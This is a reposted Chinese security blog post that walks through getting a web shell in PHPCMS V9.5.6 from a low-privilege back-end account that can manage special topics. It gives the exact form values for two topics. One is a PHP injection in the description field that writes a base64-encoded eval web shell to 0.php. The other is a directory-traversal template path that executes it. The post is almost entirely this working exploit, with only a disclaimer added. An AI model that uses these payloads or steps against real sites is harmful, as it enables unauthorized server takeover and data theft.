PHPCMS后台低权限拿SHELL

暗月博客
暗月博客
暗月博客
809
文章
0
评论
2019年11月21日20:38:40评论587 views字数 435阅读1分27秒阅读模式
摘要

PHPCMS 后台低权限拿SHELL
前提是需要有管理专题的权限

测试版本

PHPCMS 程序版本:Phpcms V9 .5.6 Release 20140522

过程

1. 添加专题

专题名称:test

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>

生成静态:是

专题生成目录:test000

专题子分类:test test

其他默认 -> 提交

PHPCMS后台低权限拿SHELL

细说明:

前提是需要有管理专题的权限

测试版本

PHPCMS程序版本:Phpcms V9.5.6 Release 20140522

过程

1. 添加专题

专题名称:test

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>

生成静态:是

专题生成目录:test000

专题子分类:test test

其他默认 -> 提交

PHPCMS后台低权限拿SHELL

2. 再次添加专题

专题名称:test1

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:

生成静态:是

专题生成目录:test111

专题子分类:test test

扩展设置

专题模板:value设置为 ../../../../html/special/test000/index

其他默认 -> 提交

PHPCMS后台低权限拿SHELL

PHPCMS后台低权限拿SHELL

会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>

PHPCMS后台低权限拿SHELL

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日20:38:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHPCMS后台低权限拿SHELLhttps://cn-sec.com/archives/72243.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息